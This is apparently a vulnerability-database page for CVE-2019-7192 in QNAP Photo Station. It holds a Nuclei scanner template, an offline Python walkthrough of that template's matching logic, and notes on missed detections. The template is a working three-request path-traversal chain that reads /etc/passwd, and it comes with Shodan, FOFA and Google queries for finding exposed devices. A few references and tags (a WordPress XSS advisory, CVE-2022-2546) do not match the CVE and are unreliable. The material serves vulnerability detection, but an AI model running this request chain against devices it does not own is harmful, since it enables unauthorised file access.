| Title | Published | Family |
|---|---|---|
| QNAP QTS And Photo Station 6.0.3 - Remote Command Execution | 30 May 2020 14:56 | 0daydb |
| QNAP QTS and Photo Station 6.0.3 - Remote Command Execution Exploit | 29 May 2020 00:00 | zdt |
| Exploit for Incorrect Authorization in Qnap Photo_Station | 21 May 2020 09:14 | githubexploit |
| Exploit for CVE-2022-2546 | 19 Sep 2024 14:05 | githubexploit |
| Exploit for Incorrect Authorization in Qnap Photo_Station | 24 May 2020 15:44 | githubexploit |
| People's Republic of China State-Sponsored Cyber Actors Exploit Network Providers and Devices | 10 Jun 2022 12:00 | ics |
| CVE-2019-7192 | 5 Dec 2019 00:00 | attackerkb |
| The vulnerability of the Photo Station photo storage application, related to privilege management errors, allows an intruder to gain unauthorized access to the system. | 7 Sep 2021 00:00 | bdu_fstec |
| CVE-2019-7192 | 20 May 2020 14:15 | circl |
| CVE-2022-2546 | 2 Feb 2023 12:14 | circl |
```yaml
id: CVE-2019-7192

info:
  name: QNAP QTS and Photo Station 6.0.3 - Remote Command Execution
  author: DhiyaneshDK
  severity: critical
  description: |
    This improper access control vulnerability allows remote attackers to gain unauthorized access to the system. To fix these vulnerabilities, QNAP recommend updating Photo Station to their latest versions.
  impact: |
    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system.
  remediation: |
    Apply the latest security patch or upgrade to a non-vulnerable version of QNAP QTS and Photo Station.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2019-7192
    - https://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html
    - https://patchstack.com/database/vulnerability/all-in-one-wp-migration/wordpress-all-in-one-wp-migration-plugin-7-62-unauthenticated-reflected-cross-site-scripting-xss-vulnerability
    - https://nvd.nist.gov/vuln/detail/CVE-2022-2546
    - https://medium.com/@cycraft_corp/qnap-pre-auth-root-rce-affecting-312k-devices-on-the-internet-fc8af285622e
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-7192
    cwe-id: CWE-863
    epss-score: 0.88213
    epss-percentile: 0.99747
    cpe: cpe:2.3:a:qnap:photo_station:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: qnap
    product: photo_station
    shodan-query:
      - 'Content-Length: 580 "http server 1.0"'
      - http.title:"photo station"
      - http.title:"qnap"
      - 'content-length: 580 "http server 1.0"'
    fofa-query:
      - title="photo station"
      - title="qnap"
    google-query:
      - intitle:"qnap"
      - intitle:"photo station"
  tags: cve,cve2019,packetstorm,lfi,rce,kev,qnap,qts,xss,vkev,vuln

http:
  - raw:
      - |
        POST /photo/p/api/album.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        a=setSlideshow&f=qsamplealbum
      - |
        GET /photo/slideshow.php?album={{album_id}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
      - |
        POST /photo/p/api/video.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        album={{album_id}}&a=caption&ac={{access_code}}&f=UMGObv&filename=.%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

    matchers-condition: and
    matchers:
      - type: regex
        part: body_3
        regex:
          - "admin:.*:0:0:"

      - type: word
        part: header_3
        words:
          - video/subtitle

      - type: status
        part: header_3
        status:
          - 200

    extractors:
      - type: regex
        name: album_id
        part: body_1
        group: 1
        regex:
          - '<output>([a-zA-Z]+)<\/output>'
        internal: true

      - type: regex
        name: access_code
        part: body_2
        group: 1
        regex:
          - encodeURIComponent\('([A-Za-z0-9]+)'\)
        internal: true
# digest: 4a0a0047304502206dcb40eb247d64901e5fd72ce7fca3e5f210dcbada38e7e6ad9060877d8250c8022100f74ac508227414b037858e805919dfbef9637361b27fd3d9142dd86322afdff9:922c64590222798bb761d5b6d8e72950
```
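The template chains three requests: the first extractor pulls an album id out of `body_1`, the second pulls the slideshow access code out of `body_2`, both are interpolated into the third request (the `internal: true` flag keeps them out of the reported output), and the `filename` parameter of that request is a URL-encoded path traversal. The finding is reported only when all three matchers on response 3 agree (`matchers-condition: and`). The script below is an added example, not code from this page or from the nuclei-templates project; it replays that decision logic offline against constructed sample responses (the album id, access code and `/etc/passwd` lines are invented for the demo) so the exact conditions for a hit, and for a miss against a patched host, are visible without touching a device.

```python
"""Offline walk-through of the CVE-2019-7192 Nuclei template's request chain.

Added example: re-implements just enough of Nuclei's semantics (internal
extractors feeding later raw requests, body_N/header_N matcher parts,
matchers-condition: and) to show when the template reports a finding.
Nothing here sends traffic; every response is constructed sample data.
"""
import re
from dataclasses import dataclass
from urllib.parse import parse_qs

# Patterns copied from the template's extractors and matchers.
ALBUM_ID_RE = re.compile(r"<output>([a-zA-Z]+)<\/output>")
ACCESS_CODE_RE = re.compile(r"encodeURIComponent\('([A-Za-z0-9]+)'\)")
PASSWD_RE = re.compile(r"admin:.*:0:0:")

# The `filename` value the template sends in request 3, still URL-encoded.
TEMPLATE_FILENAME = ".%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"


@dataclass
class Response:
    """Minimal stand-in for one HTTP response in the chain."""
    status: int
    headers: dict
    body: str

    def header_text(self) -> str:
        # Nuclei matches `part: header` against the raw header block, so
        # flatten the dict into the same shape.
        return "\n".join(f"{k}: {v}" for k, v in self.headers.items())


# Constructed responses (invented, not captured from a real device) for what a
# vulnerable Photo Station would return to the template's three requests.
VULNERABLE_RESPONSES = [
    Response(200, {"Content-Type": "text/xml"},
             "<QDocRoot><output>bDszNWlYbkF</output></QDocRoot>"),
    Response(200, {"Content-Type": "text/html"},
             "<script>var ac = encodeURIComponent('F5kd3m9QzA');</script>"),
    Response(200, {"Content-Type": "video/subtitle"},
             "root:x:0:0:root:/root:/bin/sh\n"
             "admin:x:0:0:administrator:/share/homes/admin:/bin/sh\n"),
]

# Same first two steps, but the patched host refuses the traversal in step 3.
PATCHED_RESPONSES = VULNERABLE_RESPONSES[:2] + [
    Response(403, {"Content-Type": "text/plain"}, "Access denied"),
]


def run_extractors(responses):
    """Apply the two `internal: true` extractors (body_1 -> album_id,
    body_2 -> access_code). Returns None when either regex misses, which is
    the point at which Nuclei cannot render request 3 and the chain stops."""
    if len(responses) < 2:
        return None
    album = ALBUM_ID_RE.search(responses[0].body)
    code = ACCESS_CODE_RE.search(responses[1].body)
    if not (album and code):
        return None
    return {"album_id": album.group(1), "access_code": code.group(1)}


def build_request3_body(variables):
    """Render the body of the third raw request with the extracted values."""
    return (f"album={variables['album_id']}&a=caption"
            f"&ac={variables['access_code']}&f=UMGObv"
            f"&filename={TEMPLATE_FILENAME}")


def requested_path(body):
    """Decode the `filename` parameter the way the server-side parser would,
    exposing the traversal hidden behind the %2F encoding."""
    return parse_qs(body)["filename"][0]


def matchers_pass(resp3):
    """The three matchers, all evaluated on response 3, joined with `and`."""
    checks = [
        PASSWD_RE.search(resp3.body) is not None,   # type: regex, part: body_3
        "video/subtitle" in resp3.header_text(),    # type: word, part: header_3
        resp3.status == 200,                        # type: status
    ]
    return all(checks)


def template_fires(responses):
    """True only if both extractors succeed and every matcher passes."""
    variables = run_extractors(responses)
    if variables is None or len(responses) < 3:
        return False
    return matchers_pass(responses[2])


if __name__ == "__main__":
    variables = run_extractors(VULNERABLE_RESPONSES)
    body = build_request3_body(variables)
    print("request 3 body:", body)
    print("server-side filename:", requested_path(body))
    print("vulnerable host fires:", template_fires(VULNERABLE_RESPONSES))
    print("patched host fires:", template_fires(PATCHED_RESPONSES))
```

Two details matter when reading real scan results against this logic: a host that returns a valid album id and access code but a 403 on step 3 is not reported, so the unauthenticated slideshow/access-code disclosure in steps 1 and 2 can still be present on a host the template calls clean; and the `part: header_3` word match on `video/subtitle` means a server that changes its `Content-Type` but still leaks the file would also be missed.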